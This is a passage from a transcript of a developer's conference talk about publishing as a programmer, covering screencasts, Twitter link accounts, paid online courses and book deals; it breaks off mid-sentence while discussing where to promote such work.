of left and right lines, kind of boring. If I start again from scratch and make a slight change to this program, and this is one of the problems of this, is the editing single line, you have to kind of rewrite the line, which isn't very good at all. But there we go. So I've now written a slightly different line. So if I run this, a very interesting kind of outcome occurs. And this essentially is a maze. You can take out all of this and print this out on a printer, which people did used to do in the 80s. You could then give it to the kids or whatever, or just sit and work it out yourself and go through it like a maze. And that's all from one line of code, very, very basic stuff. And you might think, well, why am I bringing this up at all? Because it's kind of very historic stuff. And just to prove that you can do this in the modern world, I made a Ruby version that uses unicode symbols for doing exactly the same thing. And I've had to add in a delay, because obviously the Commodore 64 is very slow, whereas my machine is very fast. So just to give you the same impression, that's doing the same thing in Ruby. So wow, great fun. If you do want a challenge at all, and if any of you are mathematically inclined, and you want some fun, as I tried to do on the plane right here, see if you can work out what the probability is of, as each line goes down, what the probability of actually having a solution is, turns what you consider fun. I actually do consider that fun. I'm very weird. So why is this relevant? Well, it's relevant because of this book here. Someone actually kind of remembered this line of code from their time in the Acer with this computer, and kind of brought it into the modern world, and wrote all about it. And there's about five or six authors on this book, and it just digs into, I mean, I can't really show you the pictures, because you're too far away, but there's pictures of different versions of this maze, different ways of constructing the maze, the history behind Commodore Basic, the history behind creative computing, pretty much from scratch, is covered in this book. It's a really cool book, and I've got a link to it in the notes that I'll give you at the end of this. And the reason I find it kind of interesting is that it's only through writing a book, or writing a blog post, or sharing some information that these people are actually able to take their passion for whatever it was, so in this case, creative computing, and actually turn it into something that people would want to read, or would want to buy, and can actually fuel the effort that they put into actually promoting this stuff. So I'm going to go back to the presentation now, and here's just a slightly bigger picture of the book. In case you want to pick it up, it's called basically 10 print, and then I won't pronounce the rest. Don't even put that into Amazon, because I don't think it will find it for you. So I just want to quickly nail down what is publishing. Well, publishing in the long, long, very, very old days was pretty much the action of owning a printing press, which was pretty rare, and I mean, even if you go back further than that, you had the church, and they had their scribes, writing at Bibles, and so on and so forth, and it was either that or folklore. You could pass on stories just by telling them to people, but they would change over time, which is not very useful. So when the printing press came out, basically someone could say, you know, I run the printing press, do you have anything to print? Have I got anything to print? And then I can run it out for you. So there was a real control over who could share what. That's something that we actually don't have nowadays. So if you think about all the different tech publishers, for example, you know, there's tons, sort of a riot, perhaps being the sort of canonical example of a tech publisher, but there are so many others. I'm sure if you do.net, you've probably owned quite a few books on Microsoft Press, for example, and I know many of the other speakers here have written books that you probably own. But these people act like gatekeepers. They have to approach you, you have to go to them with an idea, they have to like it, it has to go out in that way. And I don't think that that's really what publishing is about anymore. So when I use the term publishing, I'm actually referring to anything that you would do in your day-to-day jobs as a developer that isn't documentation and isn't coding. It's, you know, you're kind of thinking a little bit further ahead. You're kind of trying to get your ideas down and share ideas. So there's almost kind of a marketing aspect to it. And you might own this book if you are particularly interested in collecting programming books, which I am. I have a massive collection. I kind of have to have an office just to have all my books in. It's kind of a hobby of mine, again, very, very sad, I know. But this book is very interesting because it's one of the most owned programming books over the years, but also because it was the way to share knowledge about a language at a certain period of time that we don't have to do now. So back when C was invented, what was it, 1971, I believe? This book, how about was it later in the 70s? It was around that, you know, it was in the 70s. And they had to write a book to really explain what the C language was and why you'd want to use it, and all the basic kind of examples of how it all comes together. And then that knowledge has been passed down through the years, kind of almost like programming folklore, except it hasn't had to be repeated and got poorly translated. Although if you do code C, you know that if you go into some of the examples in this book now, they're not actually that relevant anymore because they work with very, very antique version of C. So when I say publishing, I mean the whole gamut of things, and we're going to go over what are some of them in a minute. But I want to touch on why should you publish stuff. For me, it's really all about kind of having your own voice and your own audience in some way or another. It's very easy to just like be known and become kind of well-esteemed as just a developer. And I don't mean that in any kind of derogatory way, but you will see a lot of the people that like speak at conferences, you know, people that run events and things like that have tended to become known because they've perhaps written something, or they've starred in a video, or they've been on a podcast, or things like that. That tends to be like the deeper fabric of how to kind of get on in a long-term career as a software developer. So I've always been interested in that side of it. And I was just a kind of very normal software developer for some time. I did a lot of Perl, so you can feel very sorry for me there. Unfortunately, I never got into the whole.NET side of things. I've always focused on open source stuff, and then Ruby. And you'll see Ruby come up a few times in this talk. But it's actually gone the other way now. So I was a developer who was interested in publishing, whereas now I seem to have become a publisher who kind of develops on the side. And so the reason I love it is because it gives you an audience to, you know, promote things to, to kind of get a message out if you want to invent something. It's just really great to have that audience there. And of course, something else that's really good is that if you become good at sharing your ideas, and you don't have to be a full-time publisher like I'm trying to do, you can be a publisher, a programmer who does publishing a little bit of the time, the good thing is it can sometimes allow your ideas to win over other people's. Because many people aren't interested in sharing their ideas, or at least not in a very productive, kind of driven way. So you will often see situations in life, and I know I've had this where there's a technology, or there's something that you've done, and other people have perhaps mediocre solutions. You see them as mediocre solutions. They may not be, of course. But their solution is doing well. It's getting to the top of Hacker News. It's doing well on Reddit. People are talking about it. People are using it. And your idea, not doing so well. So learning about publishing and kind of taking control of that can allow you to sometimes win some of these games. And we've seen this particularly with projects like JQuery, WordPress, Rails is a very big example. Because part of what actually drove Rails to success over some of the competing things that were out at the time was they really focused on things like screencasts. So one of the main things they had on their site was how to build a blog in 15 minutes with Rails. And that won so many people over in a very early period of having video everywhere on the internet, like YouTube hadn't even been invented at that point. So it was a really big deal that they did that. And if they hadn't done that, it may not have taken off so quickly, and perhaps something like Django would now be in the position where Rails now is. So this is where I'm going to quickly break into a video for you. Because the other thing that I want to talk about is how publishing something allows you to define the perception of something. So you might be in an area that you might consider to be reasonably boring in development. You might be working on a very tiny focused area of what you do. You may just want to kind of promote it in some way by twisting it around. And I came across a really good example of an ad in the US, sorry, I think it was Canada, for a cereal called Shreddies, which are basically these small kind of like weedy kind of meshed biscuit things that people eat for their breakfast. And they're square, they're boring, how can you make them new? You can add sugar to them, you can do things like that. But how can you just take the base product and make it more interesting? Well, they found a way. Shreddies are supposed to be square. Have any of these diamond shapes gone out? No. So this was really the whole thing about changing the perception of something. And if you are a publisher or you're in the position to actually run advertising or something along those lines, then you have a way of being able to kind of define the message. And it's a really good way of actually getting involved in open source projects is to get involved with how they're marketed sometimes, because you actually get a quite small story, just because I know I've got the time to tell it, is that this chap, and again his video is linked in the notes that I'll give you at the end, that they wanted to spend £6 billion, so I think that's about like £50 billion, a crooner or something like that, on improving the Euro-star from London to kind of like the coast of England essentially, because the French part was always really nice and fast, the English bit kind of sucked, which is very typical of England. So they wanted to spend all this money on improving it. And he suggested that perhaps they should just think about this problem in a different way. Rather than saving 40 minutes on the trip, maybe they should spend half of that money, the £3 billion, on hiring all of the world's top male and female supermodels, get them to walk up and down the train with champagne, and make everyone's journey a much better time, because then they might even argue that they'd like the train to be slowed down. So this is just a case of where you can think about things a slightly different way and change people's perception of things. Now, I know one thing that often stops people from doing what I'm going to be recommending next is they don't know what to do, or they're kind of worried about what the impression is going to be if they do try to do it. I've given a talk before about something called imposter syndrome, which is something that is very common. I speak to a lot of people who speak, and people are really at the top of the game, and not me, by any stretch. And again, perhaps I'm expressing imposter syndrome here. But people, you know, the famous names that you know, and they're kind of like, I get up on stage and I don't think I should be here, and I've only done this and this, and it all kind of feels false. And this kind of phenomenon has been played about with by the social scientists, and they've called it imposter syndrome. And one thing that happened in their studies of this is that they went into the mission class at Harvard, and I think it was like medicine. These people were like, top of their game. They've done very well to get there. And they sort of said, right, you know, on the count of three, you know, put your hand up if you think that you just managed to kind of scrape into getting into Harvard. You know, you were kind of really lucky. You just got straight in and you feel really sort of lucky to be here. And about two-thirds of the class put their hand up. So I think just acknowledging the fact that that happens and that sometimes you think, I'm not ready to do this. I don't know much. I'm not ready to write about something. You just need to sometimes draw a line under that, and good things will flow on from there. I know it's very easy to say that, stood on a stage actually discussing this, but it really is true. You know, whenever I've tried to, and I felt ignorant about something, just the fact that I've written about it or published something about it has helped me become confident about doing it. So sometimes you just need to, you know, bite the bullet as it were. And there is a quote about this, and that is, if the lion doesn't tell his story, the hunter will. So you need to be the lion basically, and go out there and tear things up. So this is a slightly interactive part, and I need you to shout out a few things. I've made a list of the different types of ways that, you know, programmers can publish things. But I just want to see if anyone's got any ideas that I haven't got. So obviously, you know, perhaps the first one to suggest is podcasting. So if anyone wants to shout out anything else, what else is there that people could do? And I'm actually going to write these down in case I have a new one from you. So just shout. Blog posts. Blog posts. Ah. Now that wasn't on my list. That's a really good one. Yes, I recognize your voice actually. I think you might be. Okay. So blog posts. I've got at least 12 of these. Videos. Articles. Articles, yeah. Tutorials. Huh? Exactly, yeah. Speaking at conferences. Twitter. Code. Ah. Okay. Yeah, it seems to keep going in and out. Is it because it's moving or is it because of the... Oh, we're going to change over. Okay, if anyone else wants to shout out anything, but I think we're doing quite well. Nope. Okay. GitHub with... Open source repositories. So yeah, similar to the code one, I guess, but yeah, GitHub in particular is a really good place. Okay, I'm going to wrap this up in a sec. Any last straggling kind of ones coming in? No. Okay, right. I'll show you the list that I came up with. So there's a few actually you didn't come up with here. So like email. I'm actually kind of biased with email because my main kind of operation is running a company that publishes email newsletters like JavaScript weekly and Ruby weekly and just a whole ton of different things. And that's kind of my main day-to-day work. In fact, as soon as I've done this talk, I have to rush out and do one. But yeah, screencasting that was mentioned in the video blogging. Again, I've mentioned video separately because there's two different types of... Just to give you an impression actually, because you probably all know what screencasting is, but here is an example. She's hoping it will load, of course. Don't want that coming up. There we go. Hi, I'm Ruby on red. Let me just show you an example of what I would call a video rather than a screencast. Hi, I'm Ruby on rails. And I'm.NET. What's going on,.NET? I was just counting my pennies making sure there's enough money in the budget for Windows Server 2008. Upgrades are cool, but they're not cheap, you know? Well, Ruby on rails is open source, which means there's no cost involved with development or deployment. Well, I guess you get what you pay for. Well, most development languages these days are going the way of open source, which means they're completely free. Free? Let me tell you about free. I saw this ad on Craigslist for a free iPod if you just send in some naked pictures of yourself. Well, it's been three weeks. I'm still waiting. Hey, can I borrow five bucks? Is it for the Windows Server or for the Booze? Windows Server, I promise. So this is actually a very, very old video, and obviously I wouldn't call this a screencast by any means. But these guys are trying to kind of get into the Ruby on Rails world very early on, and they thought the best way of doing this is to make some funny videos, because they're interested in video production and stuff anyway. So they produced these videos, and they were kind of considered to be funny enough, edgy enough, that at RailsConf, which was very big at the time, not quite so big now, but a good conference, they actually got them to play them on the keynote stage, and they kind of became almost famous overnight in that community, and they both got on to do very well in their kind of perspective endeavors. So that's what I would consider to be video. It's things that are a little bit more flippant perhaps than screencast, which is meant to be more useful. So just a few other things, and we'll touch on a couple of these in a minute, but eBooks, courses, podcasting, Twitter, I'm sure you can read my slides better than I can, and one at the end that a lot of people don't come up with is webinars, which a lot of people really hate the word webinar, which is why we rightly call them webcasts. It means exactly the same thing, and it's using the same decrepit technology underneath, but yeah, it's really, again, it's about perception, because you can make a video about a certain topic, and I know there's a few speakers at this conference who've recorded videos about things. I think John's sitting there, it's one of them. And you can buy the videos or you can watch them on YouTube or whatever, and that's all well and good. But if you take that and you make it live, and you say, right, you have to turn up at 6pm at a certain URL, and then you can watch, we give the talk live, and you can ask questions on this chat room and everything like that, people seem to get that there's slightly more value in that, and people even actually have done replays of talks. So I'm a chair of a conference in the US called Fluent, and what we do is record all the talks just like you do here, but after a year has passed, obviously we want to promote the next conference, we will take some time for the really best talks from the last event, and then we'll run them as webinars for the next thing. This isn't like a big secret or anything, but they are just basically replays. But people are on Twitter going, wow, I'm really enjoying this talk that I'm watching at the moment, and it seems that they seem to find more value in doing something live, even if the person at the other end is actually in a hall a year ago. So bear that in mind about this whole perception thing. So what I'm going to do now is, this is where it gets slightly more interactive again, is I'm going to pick from that list a couple of different of the media types, and then walk through just from my point of view what they are, what are some really good examples of doing this, and how you should get on with doing some of this stuff if you have something that you want to share. So actually it's probably best if I went back to my list to be honest. So first person to shout one out, I'll try and tackle it. Go. Video. Okay, so luckily I've already started with a video one by showing you that. I'm actually going to tie in screen casting with it, just because I have a little bit more to say about screen casting it, because it's something that I've done. The good thing about screen casting is you don't have to be particularly attractive to do it, because you can just load up a program, click record, get writing, get typing code, and bam, you end up with a product. So just to give you a very basic example, so I have a program on here called ScreenFlow for example, which unfortunately it's not very zoomed in, hopefully that will work. If you are on the map you can use ScreenFlow. If you are on Windows there's a program called Camtasia. Again, I've linked these in the notes that I'm going to give you. But what this will allow you to do is it will allow you to record some videos, so I hope this isn't going to break everything. So there you go, there I am. It will allow you to record audio and also the computer audio. So if I record at this point, I could be sitting here doing my whole thing about the maze stuff or whatever, giving some demos, I could even be moving around in my folders setting things up for demos and stuff like that. And then once I'm finished, I can come back in, I can stop the recording, and very, very simply I can start playing around with these aspects. So I might want to shrink that right down, make myself look a bit thinner. There you go. And just play around with it, crop it and all that type of stuff, just down to the essential parts. And I can also very simply do things like cutting it up. So you can hear there, this is the editing process. I can say cut this piece out, cut out the bit where I did the whole navigate around the directories, and just cut and chop and play around and things like that. And then eventually I can do a file, publish it straight to YouTube, Vimeo, and everything's great. The one thing that I suggest if you're going to do this is that you do try to script it out in some way. And I've tried so many different approaches because I actually have quite a few screen casts out there. I've sort of done an entire course where it's all screen casts and people can buy them. And I've tried two approaches. One is the approach that I've kind of taken with this talk, which is where I have basically, you know, I have listed here a bunch of very, very messy bullet points, and yes, I do still use pen and paper for almost everything. I kind of have a point, I can look at it, and I know, you know, what to say about that point. The other way you can do it, of course, is you can actually sit there and you can type out the entirety of what you want to say, almost like you're writing a book. I've found success with both ways. The problem with the first way is sometimes you can ramble a bit like I'm doing now, and you might miss points out. So even if your bullet points are really good, you can often miss things that you wanted to say, or particularly turns a phrase that you wanted to use. If, however, you script everything, you might just find it really false, and some people can't read from a script without sounding like they're scripted. That can be a bad thing and may not be what you want in your video. But the key thing is, you need to get something that's really good at recording, so like Camtasia or ScreenFlow, just because it gives you that editing stuff, which is essential. You need a good microphone, so I just did that on the internal microphone. Do not screencast on the internal microphone ever. If there's one thing you take away, do not do that, because the most common thing you'll hear, because lots of people use MacBook Pros, especially, is you'll hear fans whirring up. If you start their screencast, it sounds not too bad. They'll get a few minutes in, oh, let's compile something, and it'll be like, in the background while they're speaking, and it is really annoying as a viewer. And you will see people will just drop off at that point. So get a separate microphone. I would recommend, and this is just because this is the one I've got, of course, the Rode Podcaster, and I think Rode may even be a Norwegian company. They'll line through the O, so it's all kind of Scandinavian to me. So that's a really good one, but if you want to spend a bit less than that, there's a company called Blue, and they do a bunch of microphones called the Snowball, and the Yeti, and things like that, and they're a good kind of entry-level, basic microphone. But just don't use the internal microphone. Make sure your audio is good, and that really is just a point I have to stress. Make sure the audio is good, because even if you have an accent, or just like things that you don't like your voice, which is a problem that I had for many years before doing this, if you just don't like the way you sound, just make sure that your voice sounds good in terms of fidelity, and then people will tend to forgive you. I know there was a popular video out in the Ruby world a couple of months ago, and it was a bad guy who's got, I can't remember the name of the illness is, but it causes him to sound, I'm trying to think how to put this politically correctly, like a Dalek. Yeah, that's probably not the way I should have said it. But it's a very odd voice, and it takes some getting used to, but once you got used to it, it's great, and because it was recorded in high quality, people got used to it, and there were hardly any comments, which is weird being on YouTube, you know, you would expect there to be all kinds of stuff. So just get the audio right, that is very, very important. Oh, and yes, overact. I don't know if it's something that John can attest to, but if you kind of underact, and you perhaps try and be very subtle on a video, it doesn't tend to work, you need to kind of ham it up a bit, a bit like you would if you're speaking on stage like this, you need to speak a little bit louder than you would normally, be a bit more emotive than usual. That helps on video as well. You know, just kind of have fun with it and make a point. So, just thinking, is there anything else that I want to mention about this that I have? Oh, and of course, if you want to get some confidence with this, go back and look at some of the early Karn Academy videos. So the Karn Academy, you've probably heard of it, is this site that Bill Gates seems to love in particular, I think he's put some money into it, and it's just a guy, he sits in his house, he records math videos, he uses a tablet, so he doesn't appear on the video at all, it's just him with a tablet, and he just scribbles like math formulas and stuff, the audio is bad, the way he draws is just really bad, but it's got better over the years, but the fact is the original ones weren't amazing. So, just kind of take confidence from that, that you have permission to be as bad as that. I'm trying to think, you know, just have to say things about libeling anyone here, there's another speaking tip for you. Oh, and last but not least, get to the point fast, unlike me, it really helps if you can start a video by kind of explaining what the outcome is, or even just show the outcome, and then it's like, okay, this is how we get to this outcome. So many screencasts I've seen kind of start by going, right, okay, let's install this, and it's like, what is the actual goal of what we're doing here, what is the end product? Try and start with that and then work your way through. It's a bit like if you are a journalist and you're writing a news story, you don't start with, well, you know, there were some robbers and they bought a gun and then they did this and they did this, oh, and they've broken into the Norwegian National Bank. You kind of start from that conclusion and then you go into the details later on. So, let's go back to our list, because of course you could give a talk about every single one of these things. I'm actually going to pick one now, just because it's kind of dear to my heart, and that is Twitter. So, Twitter is good, good fun, and the reason I know this is because obviously I've been on Twitter a long time, but I'm not going to make you look at my account, because it's kind of boring. See if I can maximize this. It works. I hate this full screen stuff on the Mac, but I kind of have to use it. Right, so I have an account called JavaScript Daily, because I have the JavaScript weekly email. I thought, okay, I have tons of links coming in from people every week, but I can't get into the email, because I don't want the email to be 100 links long. So, I will use a system called Buffer, which is available at bufferapp.com, which allows you to put in tweets and link them up to an account, and it will then leak them out over a period of time. So, my Buffer account will usually have about 20 links stashed, and then it leaks out a few accounts. So, JavaScript Daily is just one of those, and it's all very, very basic stuff, but I haven't put really any effort into promoting this other than mentioning it when people sign up from the newsletter. So, I say, you know, I will follow this if you want a bit more depth. And it's doing quite well. It's only been around less than a year, I think, and it's doing like 24,000 followers. And I think it's sort of like the only, the biggest JavaScript news thing, and I haven't tried to do that at all. It's all been very, very lucky. So, you know, this is the sort of thing you could perhaps do in an area that you're knowledgeable. So, if you're knowledgeable about, you know, perhaps.NET, object relationship mappers or something, maybe there is like a market there for people who want to keep up to date with the new developments in that area. You can find the links, put them into Buffer, bam, you have an account. And the good thing about Twitter is that there are retweets, and I used to really hate the retweet system. I used to like doing it the old school way with the RT and, you know, add a bit more commentary and stuff like that. But I've actually realized that the built-in retweet mechanism is actually one of the best things that's happened because it shares things so widely and keeps the original account, you know, firmly at the center of things. So, if you're perhaps popular on Twitter or even actually not that popular and you write something and the right person retweets it and then someone else retweets it and someone else retweets it, you get that whole viral thing going on. And that is actually how JavaScript Daily has done well. It's not just from the people coming in and clicking follow that have, you know, learned about it particularly on its own. It's people that have seen things. So, I know that Brendan Eich, for example, he will occasionally retweet things from this. And of course, he has a giant audience of people who, you know, follow him as being the creator of JavaScript. And so, it's good fun. I sort of enjoy going through these, you know, every now and then just sort of seeing how many retweets they get. And it's not a huge amount considering there's 20,000, like one in a thousand people will retweet, but that really makes all the difference. And I've also had success with this, which was a complete experiment. And this is the thing about publishing is that you can experiment a lot. Like you do with code, you see a new technology and you think, I'll try this. I do the same with publishing now instead. So, one thing I saw that was becoming very popular on Twitter were quotes. People who often just put, you know, some sort of little quote from, you know, people in the past, Plato, and this and that and the other, Shakespeare, whatever. And people always retweet quotes. I don't know why this is, but it kind of makes, it seems like people think that they look smarter if they retweet smart quotes. It's kind of like, oh, he retweeted this. So, I thought, I'm going to lean on this idea and see if I can find lots of programming quotes, create an account, and see if that works. When it did. Unfortunately, I haven't actually updated it in like a really long time. So, you'll see if I scroll down, I go back to like July last year very quickly. Because I kind of almost ran out of quotes I could find. So, you know, give someone a program. You frustrate them for a day. Teach them how to program. You frustrate them for a lifetime. So, there are just tons of these. And I always tried to pick ones that are a little bit funny or you got some really deep insight from. And as you can see, you know, I've just picked one at random really here. And that's, you know, over a thousand retweets. So, it kind of proved my hypothesis that quotes get retweeted. Whereas links, not so much. They tend to get favorited more. People come back and look at later. And that is one thing that people use favorites for on Twitter a lot. So, bear that in mind. But I don't just want to look at my stuff here. I want to look at someone else actually called John D. Cook, who's kind of well known in this sphere. And what I'm actually going to do is I'm going to jump the gun here and go to my page that has all of my links on that I want to show you. Just because it's easier to go into his account this way. There's a guy called John D. Cook. He is a programmer and a bit like me, he kind of dabbles with publishing. And so he's created all these different Twitter accounts that contain tips. So, if I just zoom in a little bit, he started off with like kind of very mathematical ones and like that. But now he's going into doing like computer science, regular expressions. And if you look at how well these are doing, you know, doing very well as well. And you may find these interesting to follow as well. So this is Regex Tip. And just every single day there is a different tip. And they're very basic things, but I know a lot of people have problems with regular expressions. So, you know, you might find this really helpful. It's just a different tip each day. And he doesn't use buffer. He uses something called, I think, Hootsuite for this. But it works in a very similar way. And again, he does the same thing with computer science fact, which is usually a bit more link based. So how video compression works and yada, yada, yada. And as you can see, he's not getting a huge amount of retweets again, even though he has 66,000 followers. So do bear that in mind. That is something that happens with his accounts. Of course, you may want to do tweeting from your personal account, which is also worthwhile. One person who's perhaps the master of kind of using their account to get as many followers as possible about kind of cheating. Guy called Guy Katsaki, he used to work at Apple very early on. So he has like, what, a million followers? And pretty much all he does, he just takes things out like kind of good headlines and just links to stuff just constantly. You can see, look, 17 hours, 18 hours, 19 hours. There's at least one or two links every single hour. I used to follow him. I find this really, really annoying. But clearly there are people that love following just constant streams of links. So this could be a way for you to do it. If you do, I would keep it separate from your personal account. Because if you do this on your personal account, you'll completely annoy people that just want to know about things in your personal life. But likewise, people who are interested in the links don't want to read that you just fed your dog or all that type of stuff. And this is kind of the middle ground where I've kind of fallen into a rut with this, is that I try and do both and haven't entirely succeeded. But I'm doing well enough that I'm perfectly happy with it. So yeah, frequency is key for this. If you are going to run an account like that, you need to make sure there's something every day or at least every week. You need to have some kind of frequency to it because people will expect to see all of your stuff coming out. And just in case you do want to follow me, I am at Peter C. I have blue glasses on there and I keep having people come up to me saying, why don't you wear blue glasses? Because I've gone to cons... So yeah, so that's Twitter. I don't think there's anything else I actually wanted to say about that. Oh, there is one other minor thing is that on Twitter in the last couple of weeks in particular, there's been this extra link added to the side that sometimes comes up and it will say, do you want to promote your account? And there's this kind of feature where now if you've got something like a link account like that, you can go on, promote it and actually give Twitter money to kind of, you know, having the suggested user's box that people should, you know, connect to your account. If you are, you know, your pockets are full of money, this could be something you would like to do. It's not worth it for me because I think you end up paying something like between like 50 cents and $2 per follower. And I don't think, you know, once you get up to sort of thousands and tens of thousands of followers, spending thousands of dollars or whatever on this is a very good idea. So I'm going to randomly let someone choose another one from this list. I think we have time to do like two more of these. So please choose one I have notes on. Courses. Courses. Oh, yes. Great. Thank you. Yeah, this is one I find really interesting because if you want to, this is where the profitable comes from in, you know, the name of the talk. And I only put that in there because I just kind of like the alliteration of it, just like PPPPP. But this actually is the part where you can make a profit from doing something. So courses. There's two different ways you can do courses. And again, this is a good place to come into the web browser. You can do them online or off. So in the UK, for example, there's a company called Skills Matter and they are kind of well known for running courses. Often, you know, in the areas of Java and.NET and things like that, you pay an extremely large amount of money and you can go along for a few days and, you know, go and look at one of their courses and they teach you an off you go. And often they will do like a, you know, like a profit share. So they'll give you like a minimum amount of money and then they'll give you kind of a cut of whatever comes in. So if, you know, like 20 people are paying £1,000 to come in, you know, you can actually do very well out of this. But you could, of course, just go and set this up all by yourself. And I'm trying to remember the name of this actual course because I didn't make it. The guy that gave the keynote at the largest NDC, you might, if you were here, you might remember, he actually sang on stage, which is a very interesting experience. But I think June the 14th. Is that today? I'm not very good at dates. Okay, great. Yeah, so this week he's, you know, giving this presentation basically about giving presentations. It's not very expensive, £149, but it's got 50 people coming along. He has a big Twitter following, you know, he's well known, well respected, gives keynotes at things at NDC. And, you know, he's put together this really good page where he just kind of tries to sell you on the idea. And this is all you need, you know, if you have the right audience to put and push something like this to, you know, you have a popular blog, you have a popular Facebook account, you have one of those Twitter accounts that I was just discussing. You know, so if I wanted to promote, say, a JavaScript workshop that I wanted to run, I want to run a JavaScript workshop in London, I want to hire someone to give it. Let's say I give them whatever amount of money, I want to have 50 people come along, pay, I don't know, £300 each. You just have to kind of do the sums and work out, you know, what risks you can afford to take. But you can very easily put on a course and if you're kind of experiencing giving the information like Aril is in this case, you kind of take all the money and just give some to the venue and anyone that needs to help you, bam, you're doing good. This is actually something I'm going to get into later this year. I've got a book to finish first, but I'm actually going to try and do this in London with various topics like Go, for example. It's a very niche topic in London, have a small number of people and just sort of see how it goes. But something I've been doing before all of this, and this actually isn't mine, this is just where I got some inspiration, is there's a couple of developers called Amy Hoyt and Thomas Fuchs, I believe you pronounce this. They run something called the JavaScript Masterclass and they used to run it in person in Europe, in like Austria, Germany, places like that. Thomas Fuchs is well known because he developed Scriptaculus, which was one of the very early effects frameworks built on top of prototype. Which unfortunately has been kind of usurped by jQuery. But he became very famous because of that nonetheless, he's a very good JavaScript developer and he partnered up with his now wife, Amy Hoyt. I think they're married. This is where I'm going to have to go back and correct things. But they basically moved from doing it in person to doing it online. So you'll see down here all these virtual editions and then there's just like the four they gave in person. So again, this is a page very similar to the other one. It looks different, but what they say is the same. Do you want to know this? Do you want to know this? Here's some quotes from people that really enjoyed the course, which again you need. Here's their email kind of newsletter sign up if you want to learn about the course. And that's it. And actually I don't think they put the price on here anymore. But it used to be like $520 or something like that. And they'd have like about 25 people on each course. So if you can just do the numbers like what we're looking at there, like about $12,000. And they would run this course on two days. So perhaps just to do, because obviously I know more about my own course than theirs. I previously, before I got kind of busy doing this publishing stuff, ran my own one called Ruby Reloaded, which I haven't run since November last year and I haven't got plans to start again unfortunately. But I still have the page up and I would give two live three hour classes. I would record them all and let people download them. I would have a Q&A forum and I gave away a bunch of books that I'd written one of them and two of the others. I negotiated to pay them a fixed amount and also included in some videos I'd recorded. And I basically did the same thing. I kind of just ripped off their idea. So there's all the different things that what you can do, what happens on certain dates. And then I had the three different tiers. This was something I was trying. So the personal one was like about $700 or $800. But what they would get is they would get free hours of solo one-on-one time on Skype. Kind of almost like a pair programming type thing. There was the main one, which is the live thing and then there was the basic, which was just like, you can just buy the videos but you can't come along to the live thing. You just get the videos afterwards. Because I had people in the army joining up and they were like, oh, I can't watch this on camp or whatever. I just want to download it. So if you kind of just add it up, each time I was trying to make basically $10,000 each time. And I don't think I quite did it each time, but very close. And essentially it's two days work, but of course you have to design and implement a course and be able to deliver it and so on. That part takes a lot of time. But once you've done it once, it's a lot easier to kind of just refine and add things over time. So if you wanted to do something like this, again, it's about having that audience. And that's why I built up these email newsletters and blogs and things like that and you know, star on podcasts and do talks. It's because every time it helps build the audience up so that if I decide to run a course like this on Go, JavaScript, whatever it is that I want to learn and kind of try and become an expert in, I usually have someone that I can promote it to in one way or another. So you kind of need to make sure you've got that kind of approach. How are you going to promote something like this? But then just in terms of the actual basic tech for running it, zoom out a bit. Again, I put these links in the notes. But I use a system called Instant Presenter, which is a little bit like Adobe Connect, except I couldn't work out how to sign up for Adobe Connect because it's very confusing and enterprisey. So Instant Presenter is almost the same thing. It actually uses Java behind the scenes. So I use a separate browser just to enable Java for this. But then it takes your screen, it shares it, it does the audio. It has a really bad chat system in it as almost every single webinar and training system does. So I then use a separate system, which you might be familiar with Campfire, that First-Event Signals does. Well, if you want something that's just as good as Campfire and it's totally free, then go to talkerapp.com. It's pretty much the same thing, but it's totally free. So we have a separate chat room for this and it works really well. And people ask questions and it's great. The only thing I would advise is if you do this, try and get more people involved. I've done it on my own and try to keep an eye on the questions and think about where I am in the course. It's difficult. It would be nice to have a second person that could just, you know, experience with the topic and can go through the chat and answer questions and kind of act like a triage, essentially. So anything that's urgent can then come up to me. So I would advise you to do those two technologies. But if you just search for webinar software or training software or anything, you can find tons of stuff. But just make sure it's got screen sharing and all the things in it that you would want to do. Just the last thing I need to stress about this, even though you can make a lot of money doing this, it is very hard work. I found that after speaking for like three or four hours, even with breaks, you just feel completely wiped out and want to take the rest of the week off, which is funny what I'll do after this talk, actually. Maybe it's just me, but it does take a lot of energy to run this and to do it competently as well. Right, one I want to pick up on is books. Has anyone here actually written a book that's been published by a ye olde publisher? We have one, two, three. So, you know, not the majority by any means. But is there anyone here that, you know, if you felt you're expert enough and you know, you kind of wanted the exposure, who here would like to have a book published by like an O'Reilly, that type of thing? Maybe wavering hands. Okay, I'll keep this quick there, since it's not the majority of people. The reality nowadays, I mean, in the past, it was very much that gatekeeper thing. They were the big castle and you kind of had to storm it and come in with a really great idea and everything. The reality now is that because there's so much self-publishing going on and so many blog posts and people doing videos and people doing courses and stuff all on their own, publishers are struggling. This is something that obviously they never admit to this, they sort of get to work with quite a few publishers and see how things are on the inside. And they kind of really struggle to find good authors now who can constantly write about something and kind of know what they're talking about. So, you can almost go to any publisher. You can go to an O'Reilly, you can go to a Wiley or whatever. And if your pitch is just even vaguely good enough that they think this is a book that's going to sell something and you're the type of person who can write and meet deadlines, even if you need an editor to spend all day fixing it up, you will kind of tend to get a bite. Do not do this for money. If you take all the books, like 1% of the books will make millions. Pretty much the rest, if you break your advance, you're kind of lucky. So don't do it for the money, but do it for the cue dose. And there's lots of people that do self-publishing and they say, oh, self-publishing is the way to make money because you can take all of the dollars that you sell. You're not fighting for like a 10% share. But the fact is there is still cue dose in being published by an O'Reilly or something like that. Particularly if you wanted to leave Norway, for example, and move to the US, I know several developers who have used the fact that they have a book published with, I mean, this is a specific person as well, that they have a couple of books published with O'Reilly. It's pretty much the thing that says, okay, you apply for an extraordinary alien visa, as they call it, in you come, go get a job. So you need to be aware that that kind of issue exists and is still relevant. And especially for even perhaps going back to university, you might not have done computer science at an undergraduate level. But if you go back and say, you know, I want to do a PhD in some sort of computer science thing, they're going to look at your things and they're like, okay. You're like, oh, well, actually, I've written a book for O'Reilly about algorithms or something. Oh, right, come in. You know, there is still that kind of element of things going on. It's not quite as simple as that, but it will really help. So just bear in mind, books are actually quite easy to get into, but they're hard to write. You will need to have a very good schedule for writing them. Just because we have nine minutes left, I'm going to jump into a slightly different topic now. So I can't go through many more of these things, unfortunately. But I just want to talk about some places that you can promote this work. So once you've started to write your book or, you know, you're doing your podcast, which unfortunately is why I didn't touch at all, or your course or things like that, where can you go and put these? Well, again, as I keep saying, I have a bunch of lovely notes for you. And I will show you that you are at the end if you don't call it. So places to promote. So a few things, you know, if you can get on Hacker News, that's great, but it's full of trolls and very weird people. And the chance of getting up to the top is kind of low nowadays. So many good stories miss the point, you know, and just don't get there. Although if you went to write something about Prism or the NSA, this is the week to do it and put it on there, because basically Hacker News has turned into Prism News, unfortunately. But there are other sites that are very similar that can also drive 